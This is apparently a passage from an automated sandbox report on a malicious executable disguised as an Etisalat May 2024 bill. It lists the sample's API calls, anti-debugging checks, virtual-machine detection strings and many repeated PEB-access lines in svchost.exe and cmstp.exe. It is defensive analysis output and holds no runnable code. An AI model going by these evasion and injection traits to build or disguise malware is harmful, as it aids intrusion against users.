Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_00BCF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00BCF200
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_00BCF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00BCF35D
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_00BCF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00BCF65E
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_00BC3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00BC3A2B
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_00BC3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00BC3D4E
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_00BCBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00BCBF27
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_00ADB3C4 memset,GetPrivateProfileStringW,FindFirstFileW,memset,FindNextFileW, 4_2_00ADB3C4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_00AD894B memset,memset,memset,SHGetFolderPathW,memset,SHGetFolderPathW,CmFree,memset,FindFirstFileW,GetLastError,memset,memset,FindNextFileW,FindClose, 4_2_00AD894B
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_00B64AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00B64AFE
Source: explorer.exe, 00000003.00000003.3096650993.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000003.00000000.1990524827.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000003.00000000.1990524827.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000003.00000000.1985931630.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000003.00000003.3095738420.0000000009C92000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000000.1985931630.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000003.00000000.1984137614.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 00000003.00000003.3096650993.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000003.00000000.1990524827.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4439803552.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000000.1985931630.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000003.00000000.1985931630.0000000003530000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
Source: explorer.exe, 00000003.00000003.3096563167.0000000009BA4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000003.00000000.1984137614.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000003.00000000.1990524827.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000003.3096650993.000000000769A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe API call chain: ExitProcess graph end node graph_0-99026
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe API call chain: ExitProcess graph end node graph_0-99125
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmstp.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00409AA0 rdtsc 2_2_00409AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040ACE0 LdrLoadDll, 2_2_0040ACE0
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_00BD41FD BlockInput, 0_2_00BD41FD
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_00B63B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00B63B4C
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_00B95CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00B95CCC
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_00BDC304 LoadLibraryA,GetProcAddress, 0_2_00BDC304
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_015E3560 mov eax, dword ptr fs:[00000030h] 0_2_015E3560
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_015E3500 mov eax, dword ptr fs:[00000030h] 0_2_015E3500
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe Code function: 0_2_015E1ED0 mov eax, dword ptr fs:[00000030h] 0_2_015E1ED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h] 2_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h] 2_2_0302C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h] 2_2_03050310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03108324 mov eax, dword ptr fs:[00000030h] 2_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03108324 mov ecx, dword ptr fs:[00000030h] 2_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h] 2_2_030B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]2_2_030FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h]2_2_030D8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310634F mov eax, dword ptr fs:[00000030h]2_2_0310634F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]2_2_030D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]2_2_030EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]2_2_030B63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h]2_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]2_2_030663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]2_2_0302823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]2_2_030B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]2_2_030B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310625D mov eax, dword ptr fs:[00000030h]2_2_0310625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]2_2_0302A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]2_2_03036259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]2_2_0302826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031062D6 mov eax, dword ptr fs:[00000030h]2_2_031062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]2_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]2_2_030F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]2_2_03060124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]2_2_0302C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]2_2_030C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]2_2_03070185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
